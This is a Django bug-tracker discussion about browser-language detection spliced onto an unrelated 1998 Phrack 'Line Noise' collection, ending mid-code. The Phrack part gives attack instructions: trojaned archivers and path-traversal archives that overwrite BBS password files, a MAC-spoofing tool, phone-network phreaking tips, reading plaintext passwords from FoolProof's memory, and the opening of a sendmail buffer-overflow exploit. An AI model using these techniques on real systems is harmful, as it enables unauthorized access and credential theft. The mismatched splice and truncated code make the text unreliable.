        lang_code = request.session.get('django_language', None)
        if lang_code in supported and lang_code is not None and check_for_language(lang_code):
            return lang_code
    lang_code = request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME)
    if lang_code and lang_code not in supported:
        lang_code = lang_code.split('-')[0]  # e.g. if fr-ca is not supported fallback to fr
    if lang_code and lang_code in supported and check_for_language(lang_code):
        return lang_code
    '''
    accept = request.META.get('HTTP_ACCEPT_LANGUAGE', '')
    for accept_lang, unused in parse_accept_lang_header(accept):
        if accept_lang == '*':
            break
        # We have a very restricted form for our language files (no encoding
        # specifier, since they all must be UTF-8 and only one possible
        # language each time. So we avoid the overhead of gettext.find() and
        # work out the MO file manually.
        # 'normalized' is the root name of the locale in POSIX format (which is
        # the format used for the directories holding the MO files).
        normalized = locale.locale_alias.get(to_locale(accept_lang, True))
        if not normalized:
            continue
        # Remove the default encoding from locale_alias.
        normalized = normalized.split('.')[0]
        if normalized in _accepted:
            # We've seen this locale before and have an MO file for it, so no
            # need to check again.
            return _accepted[normalized]
        for lang, dirname in ((accept_lang, normalized),
                              (accept_lang.split('-')[0], normalized.split('_')[0])):
            if lang.lower() not in supported:
                continue
            langfile = os.path.join(globalpath, dirname, 'LC_MESSAGES', 'django.mo')
            if os.path.exists(langfile):
                _accepted[normalized] = lang
                return lang
    '''
    return settings.LANGUAGE_CODE

I would need to comment that part of code out from each new Django version without that setting.
With a setting check, if I want to use that accept-headers-based language discovery, commenting out would be unnecessary. Did that make it clearer? Why would I want or need to write a whole new language middleware if all I need is one method out of the way? Thanks, Alan.

comment:3 Changed 6 years ago by

comment:4 Changed 6 years ago by

I think the behaviour you are after is really specific and should not be included; you are basically saying "I want to ignore this 1 language when it is not set in a cookie". Removing Accept-Language headers would mean first-time visitors who have set it to Russian, for example, would get Estonian, which is probably also not ideal. In your case I would extend the LocaleMiddleware to mirror that; check the HTTP_ACCEPT_LANGUAGE in META before handing it to the LocaleMiddleware superclass and rewrite English to Estonian (META is mutable, iirc).

comment:5 Changed 6 years ago by

Please don't reopen tickets marked as "won't fix" by core developers without prior discussion on the django-developers mailing list. As for the ticket itself, the middleware does exactly what I would expect, both as a programmer and a user. I have my browser set to the 'en-US' locale because I prefer it so (although I'm a Polish-speaking person). Without the detection, I would get your site in Estonian, which is probably gibberish to me. Also, your need seems very specific, so I don't think it mandates a setting. You can make your own middleware based on the one in core.

comment:6 follow-up: 7 Changed 6 years ago by

You see things from your point of view, so let's give it one more shot:

1) Browsers/operating systems are not available in many small languages, and therefore speakers of such languages, like Estonians, have to use browsers/systems in English, and their browsers are therefore in English - they may not desire it.
2) Those users do not know how to change their browser's language - you've got to know that you and I are a HUGE minority - perhaps only 5% of users know that they CAN change their browser language. Even fewer people know how, and want to change it.

3) Those 95% of people who don't know that they CAN change their browser language, or don't know how to, usually visit pages which are in their own language (the language that they speak every day, not the language their browser is set to).

4) I want to make pages that can be seen in the default language - the language that the target audience of the page uses.

"Without the detection, I would get your site in Estonian, which is probably gibberish to me." (quoting lrekucki). Well, in such cases - you are not the target audience. Ask your parents or grandparents if they know what browser accept headers are, or whether they can change those. This probably is irrelevant if they come from English-speaking countries (or other countries whose languages are spoken by millions and millions of people), since they never need to do anything like this anyway. Parents & grandparents in countries like Estonia, Latvia, Lithuania and so on don't know about the accept headers or such either. But in most cases, their browsers are in English and they don't even know that this could be a problem.

Now, we are making the websites for our customers, and our customers are supposed to know their target audience. If we can't deliver a website which its target audience can see in its default language, then something is wrong. I fixed this wrong by commenting out undesired code. Not very DRY. Getting everybody who faces a similar problem to extend their middleware is also not very DRY. Why would all those people have to repeat themselves?

I still say that such a setting option would be the best way to solve this. If I can't change your mind about this - so be it. If I'm gonna be the only one to see sanity in this, then so be it - I know how to fix this.
Just thought that this would be a nice minor improvement. Moving discussion to dev's.

comment:7 Changed 6 years ago by.

The default language is defined as the language to fall back to when no suitable language can be found, and since you have an English translation, there is a suitable one according to the definitions. Making a setting which breaks this behaviour is not in the interest of Django or the developers using it (just another setting in an already long list). Instead of introducing a setting which is hardly used, a solution could be to refactor get_language_from_request into two distinct parts; this means you would only have to override a very small function in LocaleMiddleware, which would not call the detection based on headers. It would not be hard to create a patch for this.

comment:8 Changed 6 years ago by

Milestone 1.3 deleted

It's unclear why a new setting is required here. HTTP-header-based language detection is performed by the locale middleware; if you don't want the behavior that is implemented... don't use that middleware. Just remove it, or provide a different middleware. If you're referring to a different piece of code, you'll need to provide more specific details than "that part of the code". Regardless, this doesn't seem to me like something that should be handled as a setting.
---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 03 of 15

-------------------------[ P H R A C K 5 3 L I N E N O I S E

--------[ Various

0x1>-------------------------------------------------------------------------

On not being a moron in public - nihilis

(In response to why cantor kick-banned someone off of #Phrack without warning:
<cantor:#phrack> you were an idiot near me
<cantor:#phrack> i hate that)

I wouldn't think normally that this is an article which needs to be written. But as experience has shown, it may very well be. Several months ago I was on the IRC EFnet's channel #phrack and one of the users spouted a URL for a web page he and his cohorts had hacked. On it he had kindly sent salutations to everyone he knew and to Phrack. We, the other occupants of the channel, all admitted that none of us spoke authoritatively on the magazine's behalf, but that we were confident that none of the editorial staff would appreciate being implicated in a felony by association. The user didn't seem to understand. The next day, when the user was asked to join some of the authorities at the local station-house for a short interview, I'm sure he wet his pants. The line of questioning was short: it merely established that he had not been the culprit in further attacks on the same host. The police released him uncharged. In discussions with him later on #Phrack, we weren't surprised to find that he had been apprehended. As things played out, the user clearly felt no crime had been committed: All he did was change a web page. He adamantly protested that he didn't do any damage, he didn't put in any backdoors, he didn't know that root's .rhosts contained four simple bytes: "+ +\n".
Clearly this user didn't look very hard in what were apparently his several weeks of attempting to hack the site. Interestingly enough, I haven't seen this user on IRC since about a week after the episode. There are several morals to this story: Hacking is a felony. Any unauthorized access constitutes hacking. If you do hack something, don't be a moron about it. It's likely always been this way, but it's only been more recently I've been paying attention, I suspect: The advent of information availability and a rise in the number people for whom the net has always been "the norm" is producing a class of users who cannot think for themselves. As reliance upon scripted attacks increases, the number of people who personally possess technical knowledge decreases. Today I was lurking and watching the activity on #Phrack while tending to issues at work. The two largest discussions which come to mind are that SYN flooding cannot be prevented, even using the newest Linux kernel; and what 0x0D means and that, yes, it is interchangeable for 13 in a C program. For the latter, the opposing point of view was presented by "an experienced C programmer." This was actually a civil conversation. People in-the-know were actually a little more crude than necessary, and the groups in need of reeducation admitted faults without needing four reference sources and three IETF standards quoted. It was a good day. People these days seem generally unwilling to concede that someone else on the Internet has done their homework, has studied the standards, and has an advantage. They consider themselves experienced because they got an unpatched Windows NT to bring up the Blue Screen Of Death remotely using a program published four months ago. They hack web pages and put their names on it. They seem unwilling to read the code given to them to establish exactly what happens when the newest 0-day exploit runs. They do not find the holes. 
They seem generally more interested in fucking someone over (unaware of potential consequences) than in really solving any sort of technical problem. It's all a race, it's all a game, it's all a matter of who has the newest tools. I'm writing this now because I'm sick of that. I'm sick of people who think they're smart and are intent on making sure I know it by putting their feet in their mouths. I'm sick of people who persistently ignore advice given to them and get angry when the consequences happen. I'm sick of people who cannot contribute intelligently to a conversation. So here are some tips for the future: You're a lot more impressive if you say something right than if you say something wrong. Someone nearby may be able to verify your claim and may call you on it. You're a lot more impressive if you can do something effortlessly because you've done it before than if you bumble and stumble through an experience because you thought you could do it and were wrong. If you're caught in a lie, admit it. The people who caught you already know more than you do: If you continue to spout bullshit, they'll know that too. But do your homework. Don't let them catch you being an idiot twice. If you do something illegal, don't broadcast it. This is especially stupid. Chances are, someone will be looking for someone to blame soon. By announcing that you're responsible, you're inviting them to contact you. 0x2>------------------------------------------------------------------------- Portable BBS Hacking Extra tips for Amiga BBS systems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ After reading Khelbin's article from Phrack 50 (article 03), it reminded me of the similar tricks I had learnt for Amiga BBS systems. So I decided to write a small article covering the Amiga specific things. As with Khelbin's article, the actual BBS software isn't particularly important since they mostly all work the same way in the respect of archivers. 
This trick can also be used on other users, but I'll cover that later in the article. Firstly, the Amiga supports pathing. This means you can set up paths which point to the directories where your commands are held. The Amiga OS also automatically sets a path to the current directory. As far as I know, you can't stop it doing this, but you don't need to anyway, if you're smart. This first problem, relating to the pathing of the current directory, is more common than you might expect, since it's such a simple thing to overlook. What happens is this: The BBS receives a new file from you, and unarchives it to a temporary dir for whatever reason. It virus checks the files (or whatever), then it attempts to recompress the files. But, if your file contained an executable named the same as the BBS's archiver, it would call the one you uploaded, since the BBS would've CDed to the temp dir to rearchive the files. As you can imagine, you can use this to activate all sorts of trojans and viruses, as long as the virus checker doesn't recognize them. A good idea is to make sure your trojan calls the proper command as well, so the sysop doesn't notice immediately. The more observant sysops will have circumvented this problem by calling the archiver with an absolute path, and/or using another method to rearchive the files, without having to CD into the temp dir. The second trick is very similar to Khelbin's method of hex-editing archives. The only difference is, on the Amiga, the backslash and slash are swapped. For example, you create a file containing a new password file for the BBS in question.

> makedir temp/BBSData
> copy MyBBSPasswords.dat temp/BBSData/userdata
> lha -r a SomeFiles.lha temp

For the makedir, make the "temp" dir name to be however long it needs to be when you overwrite the characters of it in the hex editor. In this case, we need 4.
Now, load the archive into a hex editor like FileMaster and find the string: "temp\BBSData\userdata" and change it to whatever you need, for example: "\\\\BBSData\userdata" which will unarchive 4 levels back from his temporary directory into the real BBSData dir. The only problem with this is that you need to know a little about the BBS's directory structure. But, if you intend to hack it, you should probably know that much anyway. You'll notice that within the archive, the slash and backslash are swapped. This is important to remember, since using the wrong one will mean your archive will fail to extract correctly. The article about this from Phrack 50 was for PCs, which use backslash for directory operations. The Amiga uses slash instead, but apart from that, the methods used in that article will work fine for Amiga archives. If you know the Sysop of the BBS has a program like UnixDirs installed, you can even use the ".." to get to the root dir. The only other way to do that is to use a ":", however, I am not sure if this works. I have a feeling LhA would barf. Luckily, since the Amiga isn't limited by 8.3 filename problems, you can traverse directories much more easily than with the limit imposed on PC systems. The only real way the Sysop can fix this problem is by having his temp dir for unarchiving be a device which has nothing important on it, like RAM:. That way, if the archive is extracted to RAM: and tries to step back 3 directories using "///", it'll still be in RAM: and won't screw with anything important.

0x3>-------------------------------------------------------------------------

<++> EX/changemac.c
/* * In P51-02 someone mentioned Ethernet spoofing. Here you go. * This tiny program can be used to trick some smart / switching hubs. * * AWL production: (General Public License v2) * * changemac version 1.0 (2.20.1998) * * changemac -- change MAC address of your ethernet card.
* * changemac [-l] | [-d number ] [ -r | -a address ] * * -d number number of ethernet device, 0 for eth0, 1 for eth1 ... * if -d option is not specify default value is 0 (eth0) * * -h help for changemac command * * -a address address format is xx:xx:xx:xx:xx:xx * * -r set random MAC address for ethernet card * * -l list first three MAC bytes of known ethernet vendors * (this list is not compleet, anyone who know some more * information about MAC addresses can mail me) * * changemac does not change hardware address, it just change data in * structure of kernel driver for your card. Next boot on your computer will * read real MAC form your hardware. * * The changed MAC stays as long as your box is running, (or as long as next * successful changemac). * * It will not work if kernel is already using that ethernet device. In that * case you have to turn off that device (ifconfig eth0 down). * * I use changemac in /etc/rc.d/rc.inet1 (slackware, or redhat) just line * before ifconfig for ethernet device (/sbin/ifconfig eth0 ...) * * The author will be very pleased if you can learn something form this code. * * Updates of this code can be found on: * * * Sugestions and comments can be sent to author: * Milos Prodanovic <azdaja@galeb.etf.bg.ac.yu> */ #include <string.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <unistd.h> struct LIST { char name[50]; u_char mac[3]; }; /* * This list was obtainted from vyncke@csl.sni.be, created on 01.7.93. */ struct LIST vendors[] = { {"OS/9 Network ",'\x00','\x00','\x00'}, {"BBN ",'\x00','\x00','\x02'}, {"Cisco ",'\x00','\x00','\x0C'}, {"Fujitsu ",'\x00','\x00','\x0E'}, {"NeXT ",'\x00','\x00','\x0F'}, {"Sytek/Hughes LAN Systems ",'\x00','\x00','\x10'}, {"Tektronics ",'\x00','\x00','\x11'}, {"Datapoint ",'\x00','\x00','\x15'}, {"Webster ",'\x00','\x00','\x18'}, {"AMD ? 
",'\x00','\x00','\x1A'}, {"Novell/Eagle Technology ",'\x00','\x00','\x1B'}, {"Cabletron ",'\x00','\x00','\x1D'}, {"Data Industrier AB ",'\x00','\x00','\x20'}, {"SC&C ",'\x00','\x00','\x21'}, {"Visual Technology ",'\x00','\x00','\x22'}, {"ABB ",'\x00','\x00','\x23'}, {"IMC ",'\x00','\x00','\x29'}, {"TRW ",'\x00','\x00','\x2A'}, {"Auspex ",'\x00','\x00','\x3C'}, {"ATT ",'\x00','\x00','\x3D'}, {"Castelle ",'\x00','\x00','\x44'}, {"Bunker Ramo ",'\x00','\x00','\x46'}, {"Apricot ",'\x00','\x00','\x49'}, {"APT ",'\x00','\x00','\x4B'}, {"Logicraft ",'\x00','\x00','\x4F'}, {"Hob Electronic ",'\x00','\x00','\x51'}, {"ODS ",'\x00','\x00','\x52'}, {"AT&T ",'\x00','\x00','\x55'}, {"SK/Xerox ",'\x00','\x00','\x5A'}, {"RCE ",'\x00','\x00','\x5D'}, {"IANA ",'\x00','\x00','\x5E'}, {"Gateway ",'\x00','\x00','\x61'}, {"Honeywell ",'\x00','\x00','\x62'}, {"Network General ",'\x00','\x00','\x65'}, {"Silicon Graphics ",'\x00','\x00','\x69'}, {"MIPS ",'\x00','\x00','\x6B'}, {"Madge ",'\x00','\x00','\x6F'}, {"Artisoft ",'\x00','\x00','\x6E'}, {"MIPS/Interphase ",'\x00','\x00','\x77'}, {"Labtam ",'\x00','\x00','\x78'}, {"Ardent ",'\x00','\x00','\x7A'}, {"Research Machines ",'\x00','\x00','\x7B'}, {"Cray Research/Harris ",'\x00','\x00','\x7D'}, {"Linotronic ",'\x00','\x00','\x7F'}, {"Dowty Network Services ",'\x00','\x00','\x80'}, {"Synoptics ",'\x00','\x00','\x81'}, {"Aquila ",'\x00','\x00','\x84'}, {"Gateway ",'\x00','\x00','\x86'}, {"Cayman Systems ",'\x00','\x00','\x89'}, {"Datahouse Information Systems ",'\x00','\x00','\x8A'}, {"Jupiter ? 
Solbourne ",'\x00','\x00','\x8E'}, {"Proteon ",'\x00','\x00','\x93'}, {"Asante ",'\x00','\x00','\x94'}, {"Sony/Tektronics ",'\x00','\x00','\x95'}, {"Epoch ",'\x00','\x00','\x97'}, {"CrossCom ",'\x00','\x00','\x98'}, {"Ameristar Technology ",'\x00','\x00','\x9F'}, {"Sanyo Electronics ",'\x00','\x00','\xA0'}, {"Wellfleet ",'\x00','\x00','\xA2'}, {"NAT ",'\x00','\x00','\xA3'}, {"Acorn ",'\x00','\x00','\xA4'}, {"Compatible Systems Corporation ",'\x00','\x00','\xA5'}, {"Network General ",'\x00','\x00','\xA6'}, {"NCD ",'\x00','\x00','\xA7'}, {"Stratus ",'\x00','\x00','\xA8'}, {"Network Systems ",'\x00','\x00','\xA9'}, {"Xerox ",'\x00','\x00','\xAA'}, {"Western Digital/SMC ",'\x00','\x00','\xC0'}, {"Eon Systems (HP) ",'\x00','\x00','\xC6'}, {"Altos ",'\x00','\x00','\xC8'}, {"Emulex ",'\x00','\x00','\xC9'}, {"Darthmouth College ",'\x00','\x00','\xD7'}, {"3Com ? Novell ? [PS/2] ",'\x00','\x00','\xD8'}, {"Gould ",'\x00','\x00','\xDD'}, {"Unigraph ",'\x00','\x00','\xDE'}, {"Acer Counterpoint ",'\x00','\x00','\xE2'}, {"Atlantec ",'\x00','\x00','\xEF'}, {"High Level Hardware (Orion, UK) ",'\x00','\x00','\xFD'}, {"BBN ",'\x00','\x01','\x02'}, {"Kabel ",'\x00','\x17','\x00'}, {"Xylogics, Inc.-Annex terminal servers",'\x00','\x08','\x2D'}, {"Frontier Software Development ",'\x00','\x08','\x8C'}, {"Intel ",'\x00','\xAA','\x00'}, {"Ungermann-Bass ",'\x00','\xDD','\x00'}, {"Ungermann-Bass ",'\x00','\xDD','\x01'}, {"MICOM/Interlan [Unibus, Qbus, Apollo]",'\x02','\x07','\x01'}, {"Satelcom MegaPac ",'\x02','\x60','\x86'}, {"3Com [IBM PC, Imagen, Valid, Cisco] ",'\x02','\x60','\x8C'}, {"CMC [Masscomp, SGI, Prime EXL] ",'\x02','\xCF','\x1F'}, {"3Com (ex Bridge) ",'\x08','\x00','\x02'}, {"Symbolics ",'\x08','\x00','\x05'}, {"Siemens Nixdorf ",'\x08','\x00','\x06'}, {"Apple ",'\x08','\x00','\x07'}, {"HP ",'\x08','\x00','\x09'}, {"Nestar Systems ",'\x08','\x00','\x0A'}, {"Unisys ",'\x08','\x00','\x0B'}, {"AT&T ",'\x08','\x00','\x10'}, {"Tektronics ",'\x08','\x00','\x11'}, {"Excelan 
",'\x08','\x00','\x14'}, {"NSC ",'\x08','\x00','\x17'}, {"Data General ",'\x08','\x00','\x1A'}, {"Data General ",'\x08','\x00','\x1B'}, {"Apollo ",'\x08','\x00','\x1E'}, {"Sun ",'\x08','\x00','\x20'}, {"Norsk Data ",'\x08','\x00','\x26'}, {"DEC ",'\x08','\x00','\x2B'}, {"Bull ",'\x08','\x00','\x38'}, {"Spider ",'\x08','\x00','\x39'}, {"Sony ",'\x08','\x00','\x46'}, {"BICC ",'\x08','\x00','\x4E'}, {"IBM ",'\x08','\x00','\x5A'}, {"Silicon Graphics ",'\x08','\x00','\x69'}, {"Excelan ",'\x08','\x00','\x6E'}, {"Vitalink ",'\x08','\x00','\x7C'}, {"XIOS ",'\x08','\x00','\x80'}, {"Imagen ",'\x80','\x00','\x86'}, {"Xyplex ",'\x80','\x00','\x87'}, {"Kinetics ",'\x80','\x00','\x89'}, {"Pyramid ",'\x80','\x00','\x8B'}, {"Retix ",'\x80','\x00','\x90'}, {'\x0','\x0','\x0','\x0'} }; void change_MAC(u_char *,int); void list(); void random_mac(u_char *); void help(); void addr_scan(char *,u_char *); int main(int argc, char ** argv) { char c; u_char mac[6] = "\0\0\0\0\0\0"; int nr = 0,eth_num = 0,nr2 = 0; extern char *optarg; if (argc == 1) { printf("for help: changemac -h\n"); exit(1); } while ((c = getopt(argc, argv, "-la:rd:")) != EOF) { switch(c) { case 'l' : list(); exit(1); case 'r' : nr++; random_mac(mac); break; case 'a' : nr++; addr_scan(optarg,mac); break; case 'd' : nr2++; eth_num = atoi(optarg); break; default: help(); exit(1); } if (nr2 > 1 || nr > 1) { printf("too many options\n"); exit(1); } } change_MAC(mac,eth_num); return (0); } void change_MAC(u_char *p, int ether) { struct ifreq devea; int s, i; s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) { perror("socket"); exit(1); } sprintf(devea.ifr_name, "eth%d", ether); if (ioctl(s, SIOCGIFHWADDR, &devea) < 0) { perror(devea.ifr_name); exit(1); } printf("Current MAC is\t"); for (i = 0; i < 6; i++) { printf("%2.2x ", i[devea.ifr_hwaddr.sa_data] & 0xff); } printf("\n"); /* an ANSI C ?? 
--> just testing your compiler */
    for (i = 0; i < 6; i++)
        i[devea.ifr_hwaddr.sa_data] = i[p];
    printf("Changing MAC to\t");
    /* right here i am showing how interesting is programing in C */
    printf("%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x\n",
           0[p], 1[p], 2[p], 3[p], 4[p], 5[p]);
    if (ioctl(s, SIOCSIFHWADDR, &devea) < 0) {
        printf("Unable to change MAC -- Is the eth%d device up?\n", ether);
        perror(devea.ifr_name);
        exit(1);
    }
    printf("MAC changed\n");
    /* just to be sure ... */
    if (ioctl(s, SIOCGIFHWADDR, &devea) < 0) {
        perror(devea.ifr_name);
        exit(1);
    }
    printf("Current MAC is: ");
    for (i = 0; i < 6; i++)
        printf("%X ", i[devea.ifr_hwaddr.sa_data] & 0xff);
    printf("\n");
    close(s);
}

void list()
{
    int i = 0;
    struct LIST *ptr;

    printf("\nNumber\t MAC addr \t vendor\n");
    while (0[i[vendors].name]) {
        ptr = vendors + i;
        printf("%d\t=> %2.2x:%2.2x:%2.2x \t%s \n", i++,
               0[ptr->mac], 1[ptr->mac], 2[ptr->mac], ptr->name);
        if (!(i % 15)) {
            printf("\n press enter to continue\n");
            getchar();
        }
    }
}

void random_mac(u_char *p)
{
    srandom(getpid());
    0[p] = random() % 256;
    1[p] = random() % 256;
    2[p] = random() % 256;
    3[p] = random() % 256;
    4[p] = random() % 256;
    5[p] = random() % 256;
}

void addr_scan(char *arg, u_char *mac)
{
    int i;

    if (!(2[arg] == ':' && 5[arg] == ':' && 8[arg] == ':' &&
          11[arg] == ':' && 14[arg] == ':' && strlen(arg) == 17)) {
        printf("address is not in specified format\n");
        exit(0);
    }
    for (i = 0; i < 6; i++)
        i[mac] = (char)(strtoul(arg + i*3, 0, 16) & 0xff);
}

void help()
{
    printf(" changemac - soft change MAC address of your ethernet card \n");
    printf(" changemac -l | [-d number ] [ -r | -a address ] \n");
    printf(" before you try to use it just turn ethernet card off, ifconfig ethX down\n");
    printf(" -d number number of ethernet device \n");
    printf(" -h this help \n");
    printf(" -a address address format is xx:xx:xx:xx:xx:xx \n");
    printf(" -r set random generated address \n");
    printf(" -l list first three MAC bytes of known ethernet vendors\n");
    printf(" example: changemac -d 1 -a
12:34:56:78:9a:bc\n"); } /* EOF */ <--> 0x4>------------------------------------------------------------------------- The Defense Switched Network By: DataStorm <havok@tfs.net> This is an extremely shortened tutorial on the DSN. More information is available through the DoD themselves and various places on the Internet. If you have any comments or suggestions, feel free to e-mail me. ***THE BASICS OF THE DSN*** Despite popular belief, the AUTOVON is gone, and a new DCS communication standard is in place, the DSN, or Defense Switched Network. The DSN is used for the communication of data and voice between various DoD installations in six world theaters: Canada, the Caribbean, the Continental United States (CONUS), Europe, the Pacific and Alaska, and Southwest Asia. The DSN is used for everything from video-teleconferencing, secure and insecure data and voice, and any other form of communication that can be transmitted over wiring. It is made up of the old AUTOVON system, the European telephone system, the Japanese and Korean telephone upgrades, the Oahu system, the DCTN, the DRSN, the Video Teleconferencing Network, and more. This makes the DSN incredibly large, which in turn makes it very useful. (See the section TRICKS in this article for more information.) The DSN is extremely isolated. It is designed to function even when outside communication lines have been destroyed and is not dependent on any outside equipment. It uses its own switching equipment, lines, phones, and other components. It has very little link to the outside world, since in a bombing/war, civilian telephone may be destroyed. This aspect, of course, also means that all regulation of the DSN is done by the government itself. When you enter the DSN network, you are messing with the big boys. To place a call to someone in the DSN, you must first dial the DSN access number, which lets you into the network itself. 
From there you can dial any number within the DSN, as long as it is not
restricted from your calling area or phone. (Numbers both inside and outside
the DSN can be restricted from calling certain numbers.) If you are part of
the DSN, you may periodically get a call from an operator wanting to connect
you with another person in or out of the network. To accept, you must tell
her your name and local base telephone extension, your precedence, and any
other information the operator feels she must have from you at that time.
(I'm not sure of the operator's abilities or technologies. They may have ANI
in all or some areas.)

The DSN uses signaling techniques similar to Bell's, with a few differences.
The dial tone is the same on both networks; the network is open and ready.
When you call or are being called, a DSN phone will ring just like a Bell
phone, with one difference. If the phone rings at a fairly normal rate, the
call is of average precedence, or "Routine." If the ringing is fast, it is
of higher precedence and importance. A busy signal indicates that either the
line or DSN equipment is busy. Occasionally you may hear a tone called the
"preempt" tone, which indicates that your call was booted off because one of
higher precedence needed the line you were connected with. If you pick up
the phone and hear an odd fluctuating tone, this means that a conference
call is being conducted and you are to be included.

As on many other large networks, the DSN uses different user classes to
distinguish who is better than who, who gets precedence and more calls and
who does not. The most powerful user class is the "Special C2" user. This
fortunate military employee (or hacker?) has virtually unrestricted access
to the system. The Special C2 user identifies himself as that through a
validation process. The next class of user is the regular "C2" user.
To qualify, you must have the requirements for C2 communications, but do not
have to meet the requirements for the Special C2 user advantages. (These are
users who coordinate military operations, forces, and important orders.) The
last type of user is insensitively called the "Other User." This user has no
need for Special C2 or C2 communications, so he is not given them. A good
comparison would be "root" for Special C2, "bin" for C2, and "guest" for
Other.

The network is fairly secure and technologically advanced. Secure voice is
encrypted with the STU-III. This is the third generation in a line of
devices used to make encrypted voice, which is NOT considered data over the
DSN. Networking through the DSN is done with regular IP version 4, unless
classified, in which case the Secret IP Routing Network (SIPRNET) protocol
is used. Teleconferencing can be set up by the installation operator, and
video teleconferencing is a common occurrence. The DSN is better than the
old AUTOVON system in speed and quality, which allows it to take more
advantage of these technologies. I'm sure that as we progress into faster
transmission rates and higher technology, we will begin to see the DSN use
more and more of what we see the good guys using on television.

Precedence on the DSN fits the standard NCS requirements, so I will not talk
about it in great detail in this article. All I think I have to clear up is
that DSN phones do NOT use the A, B, C, and D buttons for precedence as the
phones in the AUTOVON did. Precedence is done completely with standard DTMF
for efficiency.

A DSN telephone directory is not distributed to the outside, mainly because
of the cost and lack of interest. However, I have listed the NPAs for the
different theaters. Notice that the DSN only covers major ally areas. You
won't be able to connect to Russia with this system, sorry. Keep in mind
that each base has its own operator, who, for the intra-DSN circuit, is
reachable by dialing "0."
Here is a word of advice: there ARE people who sit around all day and
monitor these lines. Further, you can be assured these are specialized teams
that work special projects at the echelons above reality. This means that if
you do something dumb on the DSN from a location they can trace back to you,
you WILL be imprisoned.

    AREA              DSN NPA
    ---------------------------
    Canada            312
    CONUS             312
    Caribbean         313
    Europe            314
    Pacific/Alaska    315/317
    S.W. Asia         318

The format for a DSN number is NPA-XXX-YYYY, where XXX is the installation
prefix (each installation has at least one of its own) and YYYY is the
unique number assigned to each internal pair, which eventually leads to a
phone. I'm not even going to bother with a list of numbers; there are just
too many. Check (my home page) for the official DSN directory and more
information.

DSN physical equipment is maintained and operated by a team of military
specialists designated specifically for this task (you won't see many Bell
trucks around DSN areas). Through even my deepest research, I was unable to
find any technical specifications on the hardware of the actual switch,
although I suppose they run a commercial brand such as the ESS 5. My
resources were obscure in this area, to say the least.

***TRICKS***

Just like any other system in existence, the DSN has security holes and toys
we all can have fun with. Here are a few. (If you find any more, drop me an
e-mail.)

* Operators are located on different pairs in each base; one can never tell
  before dialing exactly who is behind the other line. My best luck has been
  with XXX-0110 and XXX-0000.

* To get their number in the DSN directory, DoD installations write to:

      HQ DISA, Code D322
      11440 Isaac Newton Square
      Reston, VA 20190-5006

* Another interesting address: it seems that

      GTE Government Systems Corporation
      Information Systems Division
      15000 Conference Center Drive
      Chantilly, VA 22021-3808

  has quite a bit of involvement with the DSN and its documentation
  projects.
***IN CONCLUSION***

As the DSN grows, so does my fascination with the system. Watch for more
articles about it. I would like to say a BIG thanks to someone who wishes to
remain unknown, a special English teacher, and the DoD for making their
information easy to get a hold of.

0x5>-------------------------------------------------------------------------

Howdy,

I have found a weakness in the password implementations of FoolProof.
FoolProof is a software package used to secure workstations and LAN client
machines from DoS and other lame-ass attacks by protecting system files
(autoexec.bat, config.sys, system registry) and blocking access to specified
commands and control panels. FoolProof was written by SmartStuff Software,
originally for the Macintosh but recently released for win3.x and win95. All
my information pertains directly to versions 3.0 and 3.3 of both the 3.x and
95 versions, but should be good for all earlier versions if they exist. I
have spent some time playing with it.

It is capable of modifying the boot sequence on win3.x machines to block the
use of hot keys and prevent users from breaking out of autoexec. It also
modifies the behavior of command.com so that commands can be verified
against a database and anything deemed unnecessary or potentially malicious
can be blocked (fdisk, format, dosshell?, dir, erase, del, defrag, chkdsk,
undelete, debug, etc.). Its Windows clients provide a way to log into/out of
FoolProof for privileged access by using a password or hot-key assignment.
The newer installations on 95 machines have a centralized configuration
database that lives on our NetWare server.

My first success with breaking FoolProof passwords came by using a hex
editor to scan the Windows swap file for anything that might be of interest.
In the swap file I found the password in plain text. I was surprised, but
thought that it was something that would be simply unavoidable and
unpredictable.
Later, though, I used a memory editor on the machine (95 loves it when I do
that) and found that FoolProof stores a copy of the user password IN PLAIN
TEXT inside its TSR's memory space. To find a FoolProof password, simply
search through conventional memory for the string "FOOLPROO" (I don't know
what they did with that last "F") and the next 128 bytes or so should
contain two plaintext passwords followed by the hot-key assignment. For some
reason FoolProof keeps two passwords on the machine: the present one and a
'legacy' password (the one you used before you _thought_ it was changed).

There exist a few memory viewers/editors, but it isn't much effort to write
something. Getting to a point where you can execute something can be
difficult, but isn't impossible. I found that it is more difficult to do
this on the win3.x machines because FoolProof isn't compromised by the
operating system it sits on top of; basically, getting a DOS prompt is up to
you (try File Manager if you can). 95 is easier because it is very simple to
convince 95 that it should start up in Safe Mode, create a shortcut in the
StartUp group to your editor, and reboot the machine (FoolProof doesn't get
a chance to load in Safe Mode).

I tried to talk to someone at SmartStuff, but they don't seem to care what
trouble their simple-minded users might get into. They told me I must be
wrong because they use 128-bit encryption on the disk. Apparently they don't
even know how their own software works, because the utility they provide to
recover lost passwords requires some 32+ character master password that is
hardwired into each installation.

JohnWayne <john__wayne@juno.com>

0x6>-------------------------------------------------------------------------

[ old skool dept. ]

<++> EX/smrex.c
/*
 * Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd.
 * If you don't know what to do from there, kill yourself.
 * Remote stack pointer is guessed, the offset from it to the code is 188.
 *
 * Use: smrex buffersize padding |nc hostname 25
 *
 * where `padding` is a small integer, 1 works on my sparc 1+
 *
 * I use smrex 84 1, play with the numbers and see what happens. The core
 * gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and
 * see where your offsets went wrong :)
 *
 * I don't *think* this is the 8lgm syslog() overflow - see how many versions
 * of sendmail this has carried over into and let me know. Or don't, I
 * wouldn't :)
 *
 * P.S. I'm *sure* there are cleverer ways of doing this overflow. So sue
 * me, I'm new to this overflow business..in my day everyone ran YPSERV and
 * things were far simpler... :)
 *
 * The Army of the Twelve Monkeys in '98 - still free, still kicking arse.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    long unsigned int large_string[10000];
    int i, prelude;
    unsigned long offset;
    char padding[50] = "";      /* must start empty: strcat() appends */

    offset = 188;               /* Magic numbers */

    if (argc < 3) {             /* check args before touching argv[1]/argv[2] */
